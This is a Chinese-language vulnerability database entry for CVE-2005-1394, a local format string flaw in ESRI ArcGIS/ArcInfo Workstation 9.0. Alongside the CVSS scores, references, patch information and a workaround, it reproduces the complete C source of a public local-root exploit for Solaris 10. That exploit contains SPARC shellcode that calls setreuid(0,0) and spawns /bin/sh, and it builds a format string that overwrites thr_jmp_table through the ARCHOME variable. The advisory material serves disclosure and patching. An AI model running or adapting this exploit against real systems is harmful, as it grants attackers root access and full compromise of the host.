CVE-2005-1394
CVSS7.2
发布时间 :2005-05-03 00:00:00
修订时间 :2016-10-17 23:19:47
NMCOE    

[原文]Format string vulnerability in ArcGIS for ESRI ArcInfo Workstation 9.0 allows local users to gain privileges via format string specifiers in the ARCHOME environment variable to (1) wservice or (2) lockmgr.


[CNNVD]ESRI ArcInfo Workstation多个本地缓冲区溢出及格式化字符串漏洞(CNNVD-200505-877)

        ESRI ArcInfo Workstation 9.0的ArcGIS存在格式化字符串漏洞,本地用户可以通过在传递给(1)wservice或(2)lockmgr的ARCHOME环境变量中的格式化字符串限定符来获取权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:esri:arcinfo_workstation:9.0ESRI ArcInfo Workstation 9.0
cpe:/a:esri:arcgis:9.0ESRI ArcGIS 9.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1394
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1394
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-877
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=full-disclosure&m=111489411524630&w=2
(UNKNOWN)  FULLDISC  20050430 DMA[2005-0425a] - 'ESRI ArcGIS 9.x multiple local vulnerabilities
http://securitytracker.com/id?1013852
(VENDOR_ADVISORY)  SECTRACK  1013852
http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015
(UNKNOWN)  CONFIRM  http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015
http://www.digitalmunition.com/DMA%5B2005-0425a%5D.txt
(PATCH)  MISC  http://www.digitalmunition.com/DMA%5B2005-0425a%5D.txt

- 漏洞信息

ESRI ArcInfo Workstation多个本地缓冲区溢出及格式化字符串漏洞
高危 格式化字符串
2005-05-03 00:00:00 2005-10-20 00:00:00
本地  
        ESRI ArcInfo Workstation 9.0的ArcGIS存在格式化字符串漏洞,本地用户可以通过在传递给(1)wservice或(2)lockmgr的ARCHOME环境变量中的格式化字符串限定符来获取权限。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        ESRI ArcInfo Workstation on UNIX 8.3
        ESRI ArcInfo Workstation 8.3 Security Patch on UNIX
        http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1020

- 漏洞信息 (972)

Solaris 10.x ESRI Arcgis Local Root Format String Exploit (EDBID:972)
solaris local
2005-04-30 Verified
0 Kevin Finisterre
N/A [点击下载]
/** ESRI 9.x Arcgis local root format string exploit
**
** Copyright Kevin Finisterre and John H.
** Bug found by Kevin Finisterre <kf@digitalmunition.com>
** Exploit by John H. <johnh@digitalmunition.com>
**
** We overwrite the thr_jmp_table
** Tested on solaris 10
**/

#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define VULPROG "/export/home/arcgis/arcexe9x/bin/wservice"
#define NOP                     "\xa2\x1c\x40\x11"
int             iType;

struct
{
       unsigned long retloc;
       unsigned long retaddr;
       char          *type;
}targets[] =
{

       /* bash-2.05b$ nm /usr/lib/ld.so.1 | grep thr_jmp_table
          0003a234 d thr_jmp_table
        */
       {0xff3ea234,0xffbffba8,"SunOS 5.10sun 4u sparc SUNW"},
       {0x41424344,0x41424344,"DEBUG"},
        },v;

//shellcode taken from netric
char shellcode[] =
"55"

NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP

       // setreuid(0,0);

       "\x90\x1d\x80\x16"      // xor  %l6, %l6, %o0
       "\x92\x1d\x80\x16"      // xor  %l6, %l6, %o1
       "\x82\x10\x20\xca"      // mov  0xca, %g1
       "\x91\xd0\x20\x08"      // ta  8

       "\x90\x1d\x80\x16"      // xor          %l6, %l6, %o0
       "\x92\x1d\x80\x16"      // xor          %l6, %l6, %o1
       "\x82\x18\x40\x01"      // xor          %g1, %g1, %g1
       "\x82\x10\x20\xcb"      // mov          0x2e, %g1
       "\x91\xd0\x20\x08"      // ta           8                       [setregid(0,0)]

       "\x21\x0b\xd9\x19"      // sethi        %hi(0x2f646400), %l0
       "\xa0\x14\x21\x76"      // or           %l0, 0x176, %l0
       "\x23\x0b\xdd\x1d"      // sethi        %hi(0x2f747400), %l1
       "\xa2\x14\x60\x79"      // or           %l1, 0x79, %l1
       "\xe0\x3b\xbf\xf8"      // std          %l0, [ %sp - 0x8 ]
       "\x90\x23\xa0\x08"      // sub          %sp, 8, %o0
       "\x92\x1b\x80\x0e"      // xor          %sp, %sp, %o1
       "\x82\x10\x20\x05"      // mov          0x05, %g1
       "\x91\xd0\x20\x08"      // ta           8                       [open("/dev/tty",RD_ONLY)]

       "\x90\x10\x20\x02"      // mov          0x02, %o0
       "\x82\x10\x20\x29"      // mov          0x29, %g1
       "\x91\xd0\x20\x08"      // ta           8                       [dup(2)]

       "\x21\x0b\xd8\x9a"      // sethi        %hi(0x2f626800), %l0
       "\xa0\x14\x21\x6e"      // or           %l0, 0x16e, %l0
       "\x23\x0b\xcb\xdc"      // sethi        %hi(0x2f2f7000), %l1
       "\xa2\x14\x63\x68"      // or           %l1, 0x368, %l1
       "\xe0\x3b\xbf\xf0"      // std          %l0, [ %sp - 0x10 ]
       "\xc0\x23\xbf\xf8"      // clr          [ %sp - 0x8 ]
       "\x90\x23\xa0\x10"      // sub          %sp, 0x10, %o0
       "\xc0\x23\xbf\xec"      // clr          [ %sp - 0x14 ]
       "\xd0\x23\xbf\xe8"      // st           %o0, [ %sp - 0x18 ]
       "\x92\x23\xa0\x18"      // sub          %sp, 0x18, %o1
       "\x94\x22\x80\x0a"      // sub          %o2, %o2, %o2
       "\x82\x18\x40\x01"      // xor          %g1, %g1, %g1
       "\x82\x10\x20\x3b"      // mov          0x3b, %g1
       "\x91\xd0\x20\x08"      // ta           8                       [execve("/bin/sh","/bin/sh",NULL)]

       "\x82\x10\x20\x01"      // mov          0x01, %g1
       "\x91\xd0\x20\x08"      // ta           8                       [exit(?)]

       "\x10\xbf\xff\xdf"      // b            shellcode
       "\x90\x1d\x80\x16";     // or           %o1, %o1, %o1

/* Big endian */
/* sparc */
char *putLong (char* ptr, long value)
{
   *ptr++ = (char) (value >> 24) & 0xff;
   *ptr++ = (char) (value >> 16) & 0xff;
   *ptr++ = (char) (value >> 8) & 0xff;
   *ptr++ = (char) (value >> 0) & 0xff;

   return ptr;
}

/* main */
int main(int argc, char **argv)
{

   unsigned long retaddr;
   unsigned long retloc;
   int offset = 23;
   int dump_fmt=129;
   int al = 1;
   int i=0;
   int x=0;
   int c;
   unsigned long hi,lo;
   static unsigned long shift0,shift1;
   char    buf[9000];
   char    *args[24];
   char    *env[6];
   char            *ptr;
   char            padding[64];
   char            padding1[64];
   char            buf2[9000];

   if (argc < 3) {
               usage (argv[0]);
               return -1;
       }

     while((c = getopt(argc, argv, "h:t:")) != EOF) {
               switch(c) {
                       case 'h':
                               usage (argv[0]);
                               return 0;
                       case 't':
                               iType = atoi (optarg);
                               break;
                       default:
                               usage (argv[0]);
                               return 0;
               }
       }

if (argc < 2) { usage(argv[0]); exit(1); }

   if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
   {
       usage(argv[0]);
       printf("[-] Invalid type.\n");
       return 0;
}

   env[0] = shellcode;
   env[1] = buf2;
   env[2] = NULL;

   args[0] = VULPROG;
   args[1] = NULL;

  retloc =  targets[iType].retloc;
  retaddr = targets[iType].retaddr;

   hi = (retaddr >> 16) & 0xffff;
   lo = (retaddr >> 0) & 0xffff;

   shift0 = hi - offset - (dump_fmt * 8 + 16 + al);
   shift1 = (0x10000 +  lo) - hi;

   memset(buf,0x00,sizeof(buf));
   memset(buf2,0x00,sizeof(buf2));
   ptr = buf;

    for (i = 0; i < al; i++) {
               *ptr++ = 0x41;
       }

   ptr = putLong (ptr, 0x41414141);
   ptr = putLong (ptr, retloc);
   ptr = putLong (ptr, 0x42424242);
   ptr = putLong (ptr, retloc+2);

   for (i = 0 ; i < dump_fmt; i ++) {
               memcpy(ptr, "%.8x", 4);
               ptr = ptr + 4;
    }

   strcat(ptr,"%.");
 sprintf(ptr+strlen(ptr),"%u",shift0);
  strcat(ptr,"lx%hn");

  strcat(ptr,"%.");
   sprintf(ptr+strlen(ptr),"%u",shift1);
   strcat(ptr,"lx%hn");

   strcat(buf2,"ARCHOME=");
   memcpy(buf2+strlen(buf2),buf,strlen(buf));

   execve (args[0], args, env);
   perror ("execve");
 return 0;
}

int usage(char *p)
{
   int     i;
   printf( "Arcgis local root format string exploit\r\n");
   printf( "Usage: %s <-t target>\n",p);
   for(i=0;i<sizeof(targets)/sizeof(v);i++)
   {
       printf("%d\t%s\n", i, targets[i].type);
   }
   return 0;
}

// milw0rm.com [2005-04-30]
		

- 漏洞信息

16057
ArcInfo Workstation lockmgr Local Format String
Local Access Required, Local / Remote, Context Dependent Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

A format string vulnerability exists in the ArcInfo Workstation 'lockmgr' utility. The lockmgr binary improperly validates the format of an environment variable resulting in a segment violation overflow. With a specially crafted request, an attacker can cause execution of arbitrary code with root privileges resulting in a loss of confidentiality and integrity.

- 时间线

2005-04-30 2005-01-08
2005-04-30 Unknow

- 解决方案

Install the vendor's patch to version 9.0, as it has been reported to fix this vulnerability. Patches for ArcInfo Workstation 9.0 are available for the AIX, HP/UX, SGI/IRIX, Solaris - SunOS, and Tru64 platforms. It is also possible to reduce the possibility of the flaw being used for privilege escalation by implementing the following workaround: The ownership of the files in $ARCHOME/bin should be reviewed and any root-owned executables be switched back to the ownership of the normal (non-privileged) ArcInfo install account.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站